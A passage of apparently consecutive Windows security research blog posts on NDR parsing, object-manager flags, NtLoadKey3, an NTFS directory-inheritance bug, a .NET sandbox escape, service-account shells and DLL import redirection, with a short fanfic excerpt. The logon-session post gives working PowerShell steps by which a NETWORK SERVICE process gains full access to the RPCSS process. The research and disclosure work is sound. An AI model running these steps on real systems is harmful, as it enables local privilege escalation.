To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

[
    uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
    version(1.0),
]
interface RpcServer
{
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);
}

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];
}

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;
}

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;
}

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

void
TEST_TYPE_Decode(
    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
{
    NdrMesTypeDecode2(
         _MidlEsHandle,
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         &TypeEncoders_StubDesc,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
         _pType);
}
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

OBJ_DONT_REPARSE is (mostly) Useless.

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Silent Exploit Mitigations for the 1%

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Writing Windows File System Drivers is Hard.

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


Sharing a Logon Session a Little Too Much

The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

Taking a joke a little too far.

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Getting an Interactive Service Account Shell

Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whois and showing the use as Local Service.



DLL Import Redirection in Windows 10 1909

While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interesting was during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }


    RTL_USER_PROCESS_PARAMETERS Params = {};
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }


    // ...

}

The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },
};


extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions

};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

